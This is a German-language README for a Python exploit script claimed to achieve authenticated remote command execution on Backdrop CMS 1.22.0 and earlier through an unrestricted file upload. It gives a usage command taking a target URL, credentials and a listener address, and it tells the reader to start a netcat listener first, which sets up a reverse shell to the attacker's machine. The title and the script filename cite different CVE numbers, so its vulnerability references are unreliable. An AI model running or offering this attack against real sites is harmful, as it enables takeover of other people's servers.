
CVE-2023-46818 Python3-Exploit für Backdrop CMS <= 1.22.0 – Authentifizierte Remote-Befehlsausführung (RCE)
Dieses Python-Exploit-Skript zielt auf einen uneingeschränkten Datei-Upload in Backdrop CMS ab, um eine Remote Code Execution (RCE) zu erreichen.
Version 1.22.0 und frühere Versionen Hinweis: Backdrop CMS bestreitet dies und argumentiert, dass erweiterte Berechtigungen erforderlich sind, weshalb die Schwachstelle in Versionen über 1.22.0 möglicherweise weiterhin vorhanden ist. Meiner Vermutung nach ist damit gemeint, dass man zuerst über Admin-Zugriff verfügen müsste. Dennoch ist es eine legitime Schwachstelle, die auf jeden Fall ausgenutzt werden kann, um die volle Kontrolle über das System zu erlangen.
python3 CVE-2022-42902.py <target_url> <username> <password> <listener_ip> <listener_port>
Wichtig: Starte deinen Listener, bevor du das Skript ausführst:
nc -lvnp <listener_port>
